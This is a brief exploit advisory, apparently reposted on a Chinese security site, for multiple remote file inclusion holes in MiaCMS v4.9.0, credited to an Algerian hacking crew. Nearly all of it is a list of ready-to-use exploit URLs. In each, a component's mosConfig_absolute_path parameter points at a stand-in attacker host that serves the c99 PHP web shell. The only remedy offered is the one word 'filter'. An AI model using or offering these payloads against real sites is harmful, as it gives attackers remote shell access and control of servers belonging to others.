标题 : MiaCMS v4.9.0 Multiple Remote File Inclusion Vulnerabilities 作者 : KedAns-Dz www.2cto.com # E-mail : ked-h@hotmail.com ( ked-h@1337day.com ) | ked-h@exploit-id.com | kedans@facebook.com 平台 : php 级别 : Remote File/Sh3lL Inclusion (Multiple) 测试平台 : Windows XP SP3 (Fr) 测试方法 :
http://www.2cto.com /components/[c0m_Vuln3r4ble]/vUln3rPag3_.php?mosConfig_absolute_path=[ Ev!L Sh3lL]?
+> Expl0!t :
http://www.2cto.com /components/com_openid/openid.php?mosConfig_absolute_path=http://ev!l/c99.txt? http://www.2cto.com /components/com_newsfeeds/newsfeeds.html.php?mosConfig_absolute_path=http://ev!l/c99.txt? http://www.2cto.com /components/com_poll/poll.html.php?mosConfig_absolute_path=http://ev!l/c99.txt? http://www.2cto.com /components/com_mostlyce_frontend/mostlyce_frontend.php?mosConfig_absolute_path=http://ev!l/c99.txt? http://www.2cto.com /components/com_newsfeeds/newsfeeds.php?mosConfig_absolute_path=http://ev!l/c99.txt? http://www.2cto.com /components/com_frontpage/frontpage.php?mosConfig_absolute_path=http://ev!l/c99.txt?
www.2cto.com 修复:过滤
#-------------------------[ End ]-----------------<<
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG | # | ------------------------------------------------- < |
查看更多关于MiaCMS v4.9.0多个远程文件包含缺陷及修复 - 网站安的详细内容...